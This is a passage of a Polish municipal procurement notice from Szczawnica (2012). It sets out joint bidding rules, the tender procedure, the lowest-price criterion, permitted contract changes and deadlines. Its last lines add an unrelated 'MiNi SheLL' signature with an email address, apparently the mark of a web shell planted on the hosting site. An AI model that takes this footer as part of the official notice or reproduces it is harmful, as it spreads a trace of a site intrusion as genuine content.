15)	Zgodnie z art. 23 ust. 1 Ustawy Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku, Wykonawców ubiegających się wspólnie o udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo (w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza lub mocodawcę) musi być dołączone do oferty - o ile nie wynika z innych dokumentów załączonych przez Wykonawcę. Wykonawcy występujący wspólnie mogą złożyć tylko jedną ofertę. Dokumenty wymienione w pkt. 2 (w zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 Ustawy) winien dołączyć każdy podmiot występujący wspólnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku z art. 144 Ustawy Zamawiający informuje, że zmiana postanowień w zawartej umowie może nastąpić w następujących przypadkach:
1.	Zmiany danych teleadresowych, osób reprezentujących firmę, kluczowych specjalistów przedstawionych w umowie na inne legitymujące się, co najmniej równoważnymi uprawnieniami - na wniosek Zamawiającego lub Wykonawcy w postaci pisemnej zgody Zamawiającego.
2.	Zmian podwykonawcy, przy pomocy którego Wykonawca realizuje przedmiot umowy - na wniosek Wykonawcy w postaci pisemnej zgody Zamawiającego.
3.	Rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy - na wniosek Wykonawcy w postaci pisemnej zgody Zamawiającego.
4.	Zmiany terminu wykonania umowy o czas opóźnienia, jeżeli takie opóźnienie wystąpi lub będzie miało wpływ na wykonanie przedmiotu umowy w przypadku:
a)	zmian w dokumentacji dokonanych na wniosek Zamawiającego,
b)	siły wyższej, 
c)	przekroczenia ustawowych terminów wydania przez organy administracji lub innych instytucji branżowych  decyzji, zezwoleń, uzgodnień itp.,
d)	odmowy wydania przez w/w organy wymaganych decyzji, zezwoleń, uzgodnień itp. 
- na wniosek Zamawiającego lub Wykonawcy w postaci pisemnej zgody Zamawiającego
5.	Zmiany wysokości wynagrodzenia - na wskutek rezygnacji z wykonania części usługi wraz 
z określeniem maksymalnej wielkości tej usługi i określeniem kwoty należnej za tą część w granicach udokumentowanego interesu Zamawiającego, w postaci pisemnej akceptacji Wykonawcy i Zamawiającego.
6.	Zmiany sposobu płatności w szczególności ilości faktur przejściowych - na wniosek Zamawiającego w postaci pisemnej akceptacji Zamawiającego.
7.	Zmiany rozliczenia zamówienia na inny niż podany w projekcie umowy - na wniosek Zamawiającego w postaci pisemnej akceptacji Zamawiającego.
8.	Zmian korzystnych dla Zamawiającego - na wniosek Zamawiającego w postaci pisemnej akceptacji Zamawiającego.
9.	Nie stanowi zmiany umowy w rozumieniu art. 144 Ustawy zmiana danych związanych 
z obsługą administracyjno-organizacyjną umowy (np. zmiana konta bankowego).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szczawnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacje w przedmiotowej sprawie można otrzymać wysyłając zamówienie pocztą na adres: Urząd Miasta i Gminy Szczawnica, ul. Szalaya 103, 34-460 Szczawnica..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.07.2012 godzina 11:00, miejsce: Oferty należy składać za pośrednictwem poczty lub osobiście w siedzibie Zamawiającego w sekretariacie..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com